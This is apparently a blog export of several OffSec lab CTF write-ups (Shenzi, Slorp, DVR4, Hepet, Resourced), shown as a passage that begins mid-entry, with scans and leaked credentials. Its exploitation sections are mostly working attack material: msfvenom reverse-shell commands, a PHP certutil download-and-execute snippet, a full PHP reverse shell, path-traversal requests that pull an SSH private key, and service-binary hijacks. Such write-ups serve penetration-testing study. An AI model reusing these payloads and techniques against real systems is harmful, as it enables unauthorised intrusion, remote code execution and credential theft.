ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.55/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 | http-title: Welcome to XAMPP |_Requested resource was https://192.168.117.55/dashboard/ | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 5040/tcp open unknown 7680/tcp open pando-pub? 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). SMB # I validated this step using the evidence below before moving forward in the chain.\n1) MySQL (phpMyAdmin): User: root Password: (means no password!) 
3) Mercury (not in the USB \u0026amp; lite version): Postmaster: Postmaster (postmaster@localhost) Administrator: Admin (admin@localhost) User: newuser Password: wampp 4) WEBDAV: User: xampp-dav-unsecure Password: ppmax2011 5) WordPress: User: admin Password: FeltHeadwallWight357 Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nThe XAMPP password file from the share gives us the WordPress admin credentials. I found out that WordPress is hosted under the /shenzi directory, and visiting it we reach the login page.\nExploitation # Let's get RCE through WordPress: as admin we can edit theme files in the theme editor, and whatever PHP we put there runs on the next request.\nFirst, generate the reverse shell executable:\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.150 LPORT=4444 -f exe -o 64.exe We can paste this into a theme file (here the 404 template) so it fetches and runs the payload:\n\u0026lt;?php exec(\u0026#34;certutil -urlcache -split -f http://192.168.45.176/64.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); exec(\u0026#34;C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\64.exe\u0026#34;); ?\u0026gt; Then visit http://192.168.208.55/shenzi/themes/twentytwenty/404.php after editing 404.php (theme files normally live under wp-content/themes/, so check the real path on disk).\nThat did not work for me for some reason, so let's try another approach.\nEdit the theme header with Ivan Sincek's PHP reverse shell instead; it talks to cmd.exe directly from PHP, so no second-stage download is needed:\n\u0026lt;?php // Copyright (c) 2020 Ivan Sincek // v2.3 // Requires PHP v5.0.0 or greater. // Works on Linux OS, macOS, and Windows OS. // See the original script at https://github.com/pentestmonkey/php-reverse-shell. 
class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;r\u0026#39;), // shell can read from STDIN 1 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;), // shell can write to STDOUT 2 =\u0026gt; array(\u0026#39;pipe\u0026#39;, \u0026#39;w\u0026#39;) // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this-\u0026gt;addr = $addr; $this-\u0026gt;port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, \u0026#39;LINUX\u0026#39;) !== false) { // same for macOS $this-\u0026gt;os = \u0026#39;LINUX\u0026#39;; $this-\u0026gt;shell = \u0026#39;bash\u0026#39;; } else if (stripos(PHP_OS, \u0026#39;WIN32\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINNT\u0026#39;) !== false || stripos(PHP_OS, \u0026#39;WINDOWS\u0026#39;) !== false) { $this-\u0026gt;os = \u0026#39;WINDOWS\u0026#39;; $this-\u0026gt;shell = \u0026#39;cmd.exe\u0026#39;; } else { $detected = false; echo \u0026#34;SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\u0026#34;; } return $detected; } private function daemonize() { $exit = false; if (!function_exists(\u0026#39;pcntl_fork\u0026#39;)) { echo \u0026#34;DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\u0026#34;; } else if (($pid = @pcntl_fork()) \u0026lt; 0) { echo \u0026#34;DAEMONIZE: Cannot fork off the parent process, moving on...\\n\u0026#34;; } else if ($pid \u0026gt; 0) { $exit = true; echo \u0026#34;DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\u0026#34;; } else if (posix_setsid() \u0026lt; 0) { // once daemonized you will actually no longer see the script\u0026#39;s dump echo \u0026#34;DAEMONIZE: Forked off the parent process but cannot 
set a new SID, moving on as an orphan...\\n\u0026#34;; } else { echo \u0026#34;DAEMONIZE: Completed successfully!\\n\u0026#34;; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace(\u0026#39;\u0026lt;\u0026#39;, \u0026#39;\u0026amp;lt;\u0026#39;, $data); $data = str_replace(\u0026#39;\u0026gt;\u0026#39;, \u0026#39;\u0026amp;gt;\u0026#39;, $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\u0026#34;; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this-\u0026gt;error = true; // set global error flag echo \u0026#34;STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\u0026#34;; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this-\u0026gt;read($input, $iname, $this-\u0026gt;buffer)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $oname === \u0026#39;STDIN\u0026#39;) { $this-\u0026gt;clen += strlen($data); } // calculate the command length $this-\u0026gt;dump($data); // script\u0026#39;s dump } } // read/write method for blocking streams (e.g. 
for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat[\u0026#39;size\u0026#39;]; if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39; \u0026amp;\u0026amp; $iname === \u0026#39;STDOUT\u0026#39; \u0026amp;\u0026amp; $this-\u0026gt;clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this-\u0026gt;clen \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $this-\u0026gt;clen \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $this-\u0026gt;clen) \u0026amp;\u0026amp; $this-\u0026gt;read($input, $iname, $bytes)) { $this-\u0026gt;clen -= $bytes; $size -= $bytes; } } while ($size \u0026gt; 0 \u0026amp;\u0026amp; ($bytes = $size \u0026gt;= $this-\u0026gt;buffer ? $this-\u0026gt;buffer : $size) \u0026amp;\u0026amp; ($data = $this-\u0026gt;read($input, $iname, $bytes)) \u0026amp;\u0026amp; $this-\u0026gt;write($output, $oname, $data)) { $size -= $bytes; $this-\u0026gt;dump($data); // script\u0026#39;s dump } } public function run() { if ($this-\u0026gt;detect() \u0026amp;\u0026amp; !$this-\u0026gt;daemonize()) { $this-\u0026gt;settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this-\u0026gt;addr, $this-\u0026gt;port, $errno, $errstr, 30); if (!$socket) { echo \u0026#34;SOC_ERROR: {$errno}: {$errstr}\\n\u0026#34;; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \u0026#39;true\u0026#39; on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this-\u0026gt;shell, $this-\u0026gt;descriptorspec, $pipes, null, null); if (!$process) { echo \u0026#34;PROC_ERROR: Cannot start the shell\\n\u0026#34;; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \u0026#39;false\u0026#39; on Windows OS } // ----- 
WORK BEGIN ----- $status = proc_get_status($process); @fwrite($socket, \u0026#34;SOCKET: Shell has connected! PID: \u0026#34; . $status[\u0026#39;pid\u0026#39;] . \u0026#34;\\n\u0026#34;); do { $status = proc_get_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo \u0026#34;SOC_ERROR: Shell connection has been terminated\\n\u0026#34;; break; } else if (feof($pipes[1]) || !$status[\u0026#39;running\u0026#39;]) { // check for end-of-file on STDOUT or if process is still running echo \u0026#34;PROC_ERROR: Shell process has been terminated\\n\u0026#34;; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( \u0026#39;read\u0026#39; =\u0026gt; array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR \u0026#39;write\u0026#39; =\u0026gt; null, \u0026#39;except\u0026#39; =\u0026gt; null ); $num_changed_streams = @stream_select($streams[\u0026#39;read\u0026#39;], $streams[\u0026#39;write\u0026#39;], $streams[\u0026#39;except\u0026#39;], 0); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo \u0026#34;STRM_ERROR: stream_select() failed\\n\u0026#34;; break; } else if ($num_changed_streams \u0026gt; 0) { if ($this-\u0026gt;os === \u0026#39;LINUX\u0026#39;) { if (in_array($socket , $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } else if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39;) { // order is important if 
(in_array($socket, $streams[\u0026#39;read\u0026#39;])/*------*/) { $this-\u0026gt;rw ($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes[2])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes[1])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } } } while (!$this-\u0026gt;error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo \u0026#39;\u0026lt;pre\u0026gt;\u0026#39;; // change the host address and/or port number as necessary $sh = new Shell(\u0026#39;192.168.45.159\u0026#39;, 4444); $sh-\u0026gt;run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo \u0026#39;\u0026lt;/pre\u0026gt;\u0026#39;; ?\u0026gt; on clicking update we get a shell lol\nnow on uploading powerup we see alwaysinstallelevated can be abused so lets abuse it\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.159 LPORT=6969 -a x64 --platform Windows -f msi -o rev.msi certutil -urlcache -f http://192.168.45.199/rev.msi rev.msi and then\nmsiexec /i C:\\\\Users\\\\shenzi\\\\Desktop\\\\rev.msi /qn ","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/shenzi/","section":"CTF Writeups","summary":"","title":"Shenzi","type":"ctf-writeups"},{"content":" Slorp # Overview # OS: Windows IP: 192.168.117.53 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial Access with RFI and privesc with scheduled task.\nLoot # Loot Category Details Usernames Passwords 
Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -p- 192.168.117.53 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 10:15 EDT Warning: 192.168.117.53 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.117.53 Host is up (0.084s latency). Not shown: 65506 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 220/tcp filtered imap3 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 3921/tcp filtered herodotus-net 4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.53:4443/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 5040/tcp open unknown 7680/tcp open pando-pub? 
7918/tcp filtered unknown 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) |_http-open-proxy: Proxy might be redirecting requests | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.53:8080/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 21372/tcp filtered unknown 22306/tcp filtered unknown 24334/tcp filtered unknown 29118/tcp filtered unknown 30096/tcp filtered unknown 31763/tcp filtered unknown 33518/tcp filtered unknown 42544/tcp filtered unknown 43261/tcp filtered unknown 46575/tcp filtered unknown 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Dirbusting # shows site index.php Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe find this\nExploitation # so the parameter turned out to be susceptible to LFI\nwe find this in the backup folder\nseems to be running TFTP.EXE, let's replace it with our rev shell\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.177 LPORT=593 -f exe \u0026gt; reverse.exe now we wait\n","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/slorp/","section":"CTF Writeups","summary":"","title":"Slorp","type":"ctf-writeups"},{"content":" DVR4 # Overview # OS: Windows IP: 192.168.139.179 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # path traversal gave SSH creds, privesc with weak password.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Bitvise WinSSHD 8.48\nPORT STATE SERVICE VERSION 22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use) | ssh-hostkey: | 3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA) |_ 384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 
(ECDSA) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 7680/tcp open pando-pub? 8080/tcp open http-proxy |_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE] |_http-title: Argus Surveillance DVR | fingerprint-strings: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Connection: Keep-Alive | Keep-Alive: timeout=15, max=4 | Content-Type: text/html | Content-Length: 985 | \u0026lt;HTML\u0026gt; | \u0026lt;HEAD\u0026gt; | \u0026lt;TITLE\u0026gt; | Argus Surveillance DVR | \u0026lt;/TITLE\u0026gt; | \u0026lt;meta http-equiv=\u0026#34;Content-Type\u0026#34; content=\u0026#34;text/html; charset=ISO-8859-1\u0026#34;\u0026gt; | \u0026lt;meta name=\u0026#34;GENERATOR\u0026#34; content=\u0026#34;Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]\u0026#34;\u0026gt; | \u0026lt;frameset frameborder=\u0026#34;no\u0026#34; border=\u0026#34;0\u0026#34; rows=\u0026#34;75,*,88\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;Top\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;CamerasTopFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;ActiveXFrame\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;ActiveXIFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;CamerasTable\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;CamerasBottomFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;noframes\u0026gt; | \u0026lt;p\u0026gt;This page uses frames, but your browser doesn\u0026#39;t support them.\u0026lt;/p\u0026gt; |_ \u0026lt;/noframes\u0026gt; 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp 
open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-04-01T13:00:30 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 82.10 ms 192.168.45.1 2 82.04 ms 192.168.45.254 3 82.11 ms 192.168.251.1 4 82.17 ms 192.168.139.179 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 234.93 seconds Dirbusting # Port 8080 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # let's use the directory traversal exploit\ncurl \u0026#34;http://192.168.139.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++\u0026amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini\u0026amp;USEREDIRECT=1\u0026amp;WEBACCOUNTID=\u0026amp;WEBACCOUNTPASSWORD=\u0026#34; ok, I'm guessing the route is to grab the user's SSH key through this vuln, because SSH is normally never open on a Windows machine, so let's identify the users first\ncurl \u0026#34;http://192.168.139.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++\u0026amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa\u0026amp;USEREDIRECT=1\u0026amp;WEBACCOUNTID=\u0026amp;WEBACCOUNTPASSWORD=\u0026#34; we find the key in the user's folder\nlet's get in now\nchmod 600 the key and ssh ipaddr -i id_rsa\nthere was a weak password encryption script we saw earlier; using that we can decrypt the password stored in\nNote: Argus Surveillance DVR 4.0 configuration is present in C:\\\\ProgramData\\\\PY_Software\\\\Argus Surveillance DVR\\\\DVRParams.ini and 
cracking that gives us the password as 14WatchD0g$\n","date":"1 April 2026","externalUrl":null,"permalink":"/ctf-writeups/dvr4/","section":"CTF Writeups","summary":"","title":"DVR4","type":"ctf-writeups"},{"content":" Hepet # Overview # OS: Windows IP: 192.168.139.140 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with email macro and privesc with PowerUp.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 25/tcp open smtp Mercury/32 smtpd (Mail server account Maiser) |_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME 79/tcp open finger Mercury/32 fingerd | finger: Login: Admin Name: Mail System Administrator\\x0D | \\x0D |_[No profile information]\\x0D 105/tcp open ph-addressbook Mercury/32 PH addressbook server 106/tcp open pop3pw Mercury/32 poppass service 110/tcp open pop3 Mercury Mail Transport System pop3d |_pop3-capabilities: TOP EXPIRE(NEVER) UIDL APOP USER 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 143/tcp open imap Mercury/32 imapd 4.62 |_imap-capabilities: X-MERCURY-1A0001 AUTH=PLAIN CAPABILITY OK complete IMAP4rev1 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-title: Time Travel Company Page |_ssl-date: TLS randomness does not represent time | http-methods: |_ Potentially risky methods: TRACE | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 
2224/tcp open http Mercury/32 httpd |_http-title: Mercury HTTP Services 5040/tcp open unknown 8000/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-title: Time Travel Company Page | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 11100/tcp open vnc VNC (protocol 3.8) | vnc-info: | Protocol version: 3.8 | Security types: |_ Unknown security type (40) 20001/tcp open ftp FileZilla ftpd 0.9.41 beta |_ftp-bounce: bounce working! | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc | -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig | -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore | -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js | -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore | -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js | -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config | -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html | -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json | -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json | -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static |_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects | ftp-syst: |_ SYST: UNIX emulated by FileZilla 33006/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
TCP/IP fingerprint: Network Distance: 4 hops Service Info: Host: localhost; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2026-04-01T13:48:04 |_ start_date: N/A TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 81.75 ms 192.168.45.1 2 81.71 ms 192.168.45.254 3 82.12 ms 192.168.251.1 4 82.20 ms 192.168.139.140 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 198.58 seconds Dirbusting # Port 8000 # got a list of usernames as well\nand for some reason I think Jonas has his password out: Jonas K. : SicMundusCreatusEst\nVerifying usernames\nsmtp-user-enum -M VRFY -U users.txt -t 192.168.139.140 this gives us agnes, magnus, charlotte, martha and jones as active users\nIMAP # we were able to access the IMAP server with the creds we found earlier\non reading the mails we see that all the spreadsheets and documents are being processed in the mail server first to check compatibility\nExploitation # github.com/0bfxgh0st/MMG-LO\nlet's use this to generate our macro\nmodify accordingly\nand boom, we got a connection\nlet's modify this service to run our payload\nwe could go this route\nWrite-ServiceBinary -Name \u0026#34;VeyonService\u0026#34; -Path \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; -UserName \u0026#34;hacker\u0026#34; -Password \u0026#34;P@ssw0rd123!\u0026#34; but let's just use the rev.exe\nbecause it is unquoted we are doing this\nBecause there is a space in the path (Ela Arwel) and no quotes, Windows parses it from left to right and tries these possible executables in order: C:\\Users\\Ela.exe ← (unlikely, you probably can\u0026#39;t write here) C:\\Users\\Ela Arwel\\Veyon\\veyon.exe ← This is where you can write! 
C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe (the real one) As soon as Windows finds a valid .exe at step 2 (veyon.exe), it runs that one and stops checking. So your malicious veyon.exe gets executed as LocalSystem, and the real veyon-service.exe is completely ignored. copy \u0026#34;C:\\Users\\Public\\Documents\\rev.exe\u0026#34; \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon.exe\u0026#34; -Force OR replace the entire binary\nmove \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe.bak\u0026#34; -Force move \u0026#34;C:\\Users\\Public\\Documents\\rev.exe\u0026#34; \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; -Force now if we shutdown /r /t 0 we should get a shell in some time\n","date":"1 April 2026","externalUrl":null,"permalink":"/ctf-writeups/hepet/","section":"CTF Writeups","summary":"","title":"Hepet","type":"ctf-writeups"},{"content":"","date":"30 March 2026","externalUrl":null,"permalink":"/tags/easy/","section":"Tags","summary":"","title":"Easy","type":"tags"},{"content":" Kevin # Overview # OS: Windows IP: 192.168.139.45 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # easy RCE, no privesc needed, direct NT.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\ngot in with default creds\n","date":"30 March 2026","externalUrl":null,"permalink":"/ctf-writeups/kevin/","section":"CTF Writeups","summary":"","title":"Kevin","type":"ctf-writeups"},{"content":" Resourced # Overview # OS: Windows IP: 192.168.139.175 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # initial access with exposed creds, privesc with RBCD.\nLoot # Loot Category Details Usernames Passwords 
Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -p- 192.168.139.175 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-30 08:50 EDT Nmap scan report for 192.168.139.175 Host is up (0.081s latency). Not shown: 65515 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-30 12:50:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: resourced | NetBIOS_Domain_Name: resourced | NetBIOS_Computer_Name: RESOURCEDC | DNS_Domain_Name: resourced.local | DNS_Computer_Name: ResourceDC.resourced.local | DNS_Tree_Name: resourced.local | Product_Version: 10.0.17763 |_ System_Time: 2026-03-30T12:51:56+00:00 |_ssl-date: 2026-03-30T12:52:35+00:00; 0s from scanner time. 
